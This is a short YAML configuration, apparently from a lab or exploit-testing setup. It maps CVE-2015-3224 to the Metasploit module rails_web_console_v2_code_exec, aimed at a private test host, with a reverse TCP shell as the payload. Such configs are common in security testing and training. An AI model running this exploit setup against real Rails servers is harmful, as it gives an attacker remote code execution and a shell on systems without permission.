cve: CVE-2015-3224

metasploit_module:
  - module_type: exploit
    module_name: exploit/multi/http/rails_web_console_v2_code_exec
    options:
      - name: RHOST
        var: 192.168.33.10
      - name: RPORT
        var: 3000
      - name: PAYLOAD
        var: generic/shell_reverse_tcp
